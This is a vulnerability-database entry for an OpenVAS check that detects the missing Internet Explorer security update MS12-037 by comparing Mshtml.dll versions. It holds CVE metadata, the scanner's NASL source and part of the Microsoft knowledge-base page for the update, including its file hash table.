Microsoft Internet Explorer Multiple Vulnerabilities (2699988)

2012-06-13T00:00:00

Description

This host is missing a critical security update according to Microsoft Bulletin MS12-037.

{"id": "OPENVAS:1361412562310902682", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "published": "2012-06-13T00:00:00", "modified": "2020-06-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902682", "reporter": "Copyright (C) 2012 SecPod", "references": ["http://support.microsoft.com/kb/2699988", "http://www.securitytracker.com/id/1027147", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-037", "http://www.securelist.com/en/advisories/49412"], "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "immutableFields": [], "lastseen": "2020-06-10T19:59:47", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:86F6B513-5CD4-4249-98FD-F14E9B841B85"]}, {"type": "canvas", "idList": ["MS12_037"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-248", "CPAI-2012-249", "CPAI-2012-251", "CPAI-2012-252", "CPAI-2012-253", "CPAI-2012-255", "CPAI-2012-256", "CPAI-2012-257", "CPAI-2012-258", "CPAI-2012-262", "CPAI-2012-264", "CPAI-2012-309", "CPAI-2014-2431", "CPAI-2015-0698"]}, {"type": "cve", "idList": ["CVE-2012-1523", "CVE-2012-1544", "CVE-2012-1858", "CVE-2012-1872", "CVE-2012-1873", "CVE-2012-1874", "CVE-2012-1875", "CVE-2012-1876", "CVE-2012-1877", "CVE-2012-1878", "CVE-2012-1879", "CVE-2012-1880", "CVE-2012-1881", "CVE-2012-1882"]}, {"type": "exploitdb", "idList": ["EDB-ID:19141", "EDB-ID:19777", "EDB-ID:20174", "EDB-ID:24017", "EDB-ID:35273"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:022449B08C2DE005F39553B5E709DE12", "EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "EXPLOITPACK:A4C844F13ADB3E9DD54232C27BB897A6", "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-BROWSER-MS12_037_SAME_ID-"]}, {"type": "mskb", "idList": ["KB2695502", "KB2699988"]}, {"type": "nessus", "idList": ["SMB_NT_MS12-037.NASL", "SMB_NT_MS12-039.NASL", "SMB_NT_MS12-050.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902842", "OPENVAS:1361412562310902847", "OPENVAS:902682", "OPENVAS:902842"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113682", "PACKETSTORM:114615", "PACKETSTORM:115155", "PACKETSTORM:119467", "PACKETSTORM:127316", "PACKETSTORM:128476"]}, {"type": "saint", "idList": ["SAINT:0D86A59930F55482420F7E5F732B1327", "SAINT:1D36EAAA583304555F072139C691DB73", "SAINT:26F60ECC90154B838B0AF4C895DDCD0E", "SAINT:5D523D730147A4DFF17FF24DE76DC1B6", "SAINT:5F2CD1CEF103DC892FE640C5B9AB2538", "SAINT:625E0D0980997F6BFF377B9847205303", "SAINT:A18B5414CB2FF175AAF8AFC982E85952", "SAINT:E0DB2F32D06502F92B8144DCC51213D4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28155", "SECURITYVULNS:DOC:28156", "SECURITYVULNS:DOC:28157", "SECURITYVULNS:DOC:28204", "SECURITYVULNS:DOC:28205", "SECURITYVULNS:VULN:12404", "SECURITYVULNS:VULN:12406", "SECURITYVULNS:VULN:12466"]}, {"type": "seebug", "idList": ["SSV:60209", "SSV:60211", "SSV:60212", "SSV:60213", "SSV:60214", "SSV:60215", "SSV:60216", "SSV:60218", "SSV:60566", "SSV:73100", "SSV:73689", "SSV:74062", "SSV:87111", "SSV:87309"]}, {"type": "symantec", "idList": ["SMNTC-53841", "SMNTC-53842", "SMNTC-53843", "SMNTC-53844", "SMNTC-53845", "SMNTC-53847", "SMNTC-53848", "SMNTC-53866", "SMNTC-53867", "SMNTC-53868", "SMNTC-53869", "SMNTC-53870"]}, {"type": "thn", "idList": ["THN:A27DF5E371A39A7B4C6BA19A7BD3D4BA"]}, {"type": "threatpost", "idList": ["THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:74747632648B74F1D877E378B47EC825", "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "THREATPOST:8F0CF0787504194F36924266BB5F5678", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01"]}, {"type": "zdi", "idList": ["ZDI-12-093", "ZDI-12-188", "ZDI-12-190", "ZDI-12-192", "ZDI-12-193", "ZDI-12-194"]}, {"type": "zdt", "idList": ["1337DAY-ID-22396", "1337DAY-ID-22895"]}]}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:86F6B513-5CD4-4249-98FD-F14E9B841B85"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-248", "CPAI-2012-249", "CPAI-2012-252", "CPAI-2012-253", "CPAI-2012-256", "CPAI-2012-258", "CPAI-2014-2431"]}, {"type": "cve", "idList": ["CVE-2012-1523", "CVE-2012-1858", "CVE-2012-1872", "CVE-2012-1873", "CVE-2012-1874", "CVE-2012-1875", "CVE-2012-1876", "CVE-2012-1877", "CVE-2012-1878", "CVE-2012-1879", "CVE-2012-1880", "CVE-2012-1881", "CVE-2012-1882"]}, {"type": "exploitdb", "idList": ["EDB-ID:19777"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A4C844F13ADB3E9DD54232C27BB897A6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_IE_COLSPAN", "MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_SAME_ID"]}, {"type": "mskb", "idList": ["KB2695502"]}, {"type": "openvas", "idList": ["OPENVAS:902682"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127316", "PACKETSTORM:128476"]}, {"type": "saint", "idList": ["SAINT:0D86A59930F55482420F7E5F732B1327"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28157", "SECURITYVULNS:DOC:28205", "SECURITYVULNS:VULN:12404"]}, {"type": "seebug", "idList": ["SSV:60215", "SSV:60218"]}, {"type": "symantec", "idList": ["SMNTC-53867"]}, {"type": "thn", "idList": ["THN:A27DF5E371A39A7B4C6BA19A7BD3D4BA"]}, {"type": "threatpost", "idList": ["THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01"]}, {"type": "zdi", "idList": ["ZDI-12-188", "ZDI-12-190", "ZDI-12-192", "ZDI-12-193", "ZDI-12-194"]}, {"type": "zdt", "idList": ["1337DAY-ID-22895"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2012-1876", "epss": "0.970120000", "percentile": "0.995400000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1875", "epss": "0.967560000", "percentile": "0.994040000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1880", "epss": "0.895750000", "percentile": "0.981410000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1872", "epss": "0.921010000", "percentile": "0.983640000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1881", "epss": "0.895750000", "percentile": "0.981410000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1858", "epss": "0.967790000", "percentile": "0.994140000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1878", "epss": "0.895750000", "percentile": "0.981410000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1523", "epss": "0.910530000", "percentile": "0.982650000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1882", "epss": "0.036870000", "percentile": "0.903150000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1879", "epss": "0.895750000", "percentile": "0.981410000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1874", "epss": "0.910530000", "percentile": "0.982650000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1873", "epss": "0.015300000", "percentile": "0.850230000", "modified": "2023-03-15"}, {"cve": "CVE-2012-1877", "epss": "0.895750000", "percentile": "0.981410000", "modified": "2023-03-15"}], "vulnersScore": 6.5}, "_state": {"dependencies": 1678916735, "score": 1683966290, "epss": 1678936357}, "_internal": {"score_hash": "a3fc9d7bcd1c18c9714e3835db506b76"}, "pluginID": "1361412562310902682", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902682\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", \"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities are due to the way that Internet Explorer,\n\n - Handles content using specific strings when sanitizing HTML.\n\n - Handles EUC-JP character encoding.\n\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n\n - Accesses an object that does not exist, when handling the 'Col' element.\n\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n\n - Handles 'Scrolling' event.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2699988\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027147\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/49412\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-037\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-9]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}

{"mskb": [{"lastseen": "2021-01-01T22:37:04", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-037. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201206.aspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201206.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-5\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-037\" id=\"kb-link-6\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-037</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-7\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-8\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-9\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-10\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2696955\" id=\"kb-link-11\">2696955 </a></td><td class=\"sbody-td\">You cannot open a file whose file name is fully encoded when you use Internet Explorer 9 to browse the webpage that contains the file</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715453\" id=\"kb-link-12\">2715453 </a></td><td class=\"sbody-td\">The Save As dialog box may intermittently not be displayed when you try to download a file in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715815\" id=\"kb-link-13\">2715815 </a></td><td class=\"sbody-td\">The travel log is not updated when you post a form that is in a frame in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-14\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the name property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2718628\" id=\"kb-link-15\">2718628 </a></td><td class=\"sbody-td\">The display of a WebBrowser control may be partly erased when a menu item dropdown overlaps the control in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2719319\" id=\"kb-link-16\">2719319 </a></td><td class=\"sbody-td\">Internet Explorer 8 shuts down when you browse through a proxy server to a webpage that uses protected mode and SSL</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695422\" id=\"kb-link-17\">2695422 </a></td><td class=\"sbody-td\">A memory leak may occur when a modal dialog box opens in an iframe in Internet Explorer 8 </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695166\" id=\"kb-link-18\">2695166 </a></td><td class=\"sbody-td\">Cannot print a document in Internet Explorer 8 or Internet Explorer 9 after closing Print Preview by using the Close (red X) button </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2703157\" id=\"kb-link-19\">2703157 </a></td><td class=\"sbody-td\">Memory leak when an application calls the WinHttpGetProxyForUrl function on a Windows 7-based or Windows Server 2008 R2-based computer </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-20\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the \"name\" property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2678934\" id=\"kb-link-21\">2678934 </a></td><td class=\"sbody-td\">Internet Explorer 9 shows a download bar for links that are targeted to an iframe </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2716900\" id=\"kb-link-22\">2716900 </a></td><td class=\"sbody-td\">A file that you opened in Internet Explorer 9 may be deleted when you click Cancel in the Internet Explorer Information bar </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2699988 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2699988 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2699988, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-23\">897225 </a>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-24\">824994 </a>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\">For a list of files that are provided within these packages, click the following link: <br/><br/> <div class=\"indent\"><a href=\"http://download.microsoft.com/download/c/6/8/c68243cd-8b76-411f-a477-72f6a7e16c39/file attributes tables for security update 2699988.csv\" id=\"kb-link-26\" target=\"_self\">File attributes tables for security update 2699988.csv</a></div><h3 class=\"sbody-h3\">File hash table</h3>The following table lists the thumbprints of the certificates that are used to sign the security updates. Verify the certificate thumbprint in this KB article against the certificate thumbprint indicated on the security update that you download.<br/><br/><br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Publisher Filename</span></td><td class=\"sbody-td\"><span class=\"text-base\">Sha1</span></td><td class=\"sbody-td\"><span class=\"text-base\">SHA2</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">53324A0E42AEB5DE86E059613D33E3D13FB9686A</td><td class=\"sbody-td\">17C0FB2EF4644670ACB560A93BF79F3EF77A4F35F018498103611A8ADE84668C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">4B977D8EB3C2E8E366B0011A1E8ADE27C2DCA55E</td><td class=\"sbody-td\">B518113FFAE760022EE98680567F5F321C82D64E63DA83F56874CF140B3DE05C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">76D37077F850532294329FF714C8A5E838CA5093</td><td class=\"sbody-td\">26F52454F97BE9BCDD52B992272D6820E62479EAEDA0F60D953C9EFF5FF55DE5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">4D8274EFA81B59715C5306154E7C538ADD69B73D</td><td class=\"sbody-td\">E121B54C84E14CF2380F909A65CEF47EEFD0F2F0DF420B8D776D688CA2316212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">3FF5FB761EF680CBF5663EBC8526CF816B78A422</td><td class=\"sbody-td\">6651F5A15548DAB0B169DB00578AE46113254181FCDFB2B42F05C2FCBFDB6EF4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">49271F1A17ECC761235C2CFCAA5BE7856B5C4043</td><td class=\"sbody-td\">92D40F9E72B15353730D3F3B2D0D3A2FD8D5D9EB88620285A4B8FFD6A6FDAAE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">C6DA0ABC4A614D26FF789F6671E075C48DB4E921</td><td class=\"sbody-td\">99B503BFD5A6D7FB57A9F29868832FA2B4D3A3581775BCE9CC6292C6C63E3B91</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">55D7DF59F4120882746EDE0C88AE18FA13E2656E</td><td class=\"sbody-td\">F5F6BC7C6B3CE82DF64235DA3A384896A8AD7850BBEB2BD2C9BD6F0A79135AF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">6341B3CC0D30E97C21F663EF2FF315461CF0D9F3</td><td class=\"sbody-td\">45E44ACD48E1BB1165D0429BB6DF6478C8286174972CD7E4A44FE8B97E0D81D4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">C2DE6F6D9F0C946221A561DD747F06986F1F80C2</td><td class=\"sbody-td\">29164695BAAFC26E99BD4363787D71CEB26F28857C069F5DB4C28B68E628759B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">BAEC609413E2B63036797B91DD83B3F846501AD1</td><td class=\"sbody-td\">895E73B1B7340D5F13AA9DE57A38E93B0473BFAC5623CF0962B0A9B066B0EBDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">520E5F469C55468D990C4A9B45B58E9E00B4FC5C</td><td class=\"sbody-td\">1207CA4DC0C093EF0792B54BFB4BF0FAAAFB9BC407C3F0EE412DF6C4F4A4504B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">D0E1CEDDBFFD8A10B5EBAC568BB72241364453BA</td><td class=\"sbody-td\">0AF5DBC61D454601A4F9AECB5D979993B541DAAE11090C6A2A1A61C45D202B5E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">8D6B0D5B080328AC6D3ECADAC9524E1BDEDB9EE4</td><td class=\"sbody-td\">1855D9D549A714C38E29A6CA11798A1418A63AB4EB5B21D724D488C9E76D84F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">CCA5558F2076326C1BAC2F682C920911729F42CA</td><td class=\"sbody-td\">4D1617A49D63ADE567105AEAAE495D76C42DF5A43313652D19B2649B931F3997</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">4EADFE9DB4C9AFF061D1FB8B6395C9C3E8B49CB4</td><td class=\"sbody-td\">CFD65D5D8B88794FA5528E51F59211AC06B989A7E7E2C81A37FBC807FF29AE4E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">CAA96AB4199B553A6CCF3417ECE6D21F08DC9BF6</td><td 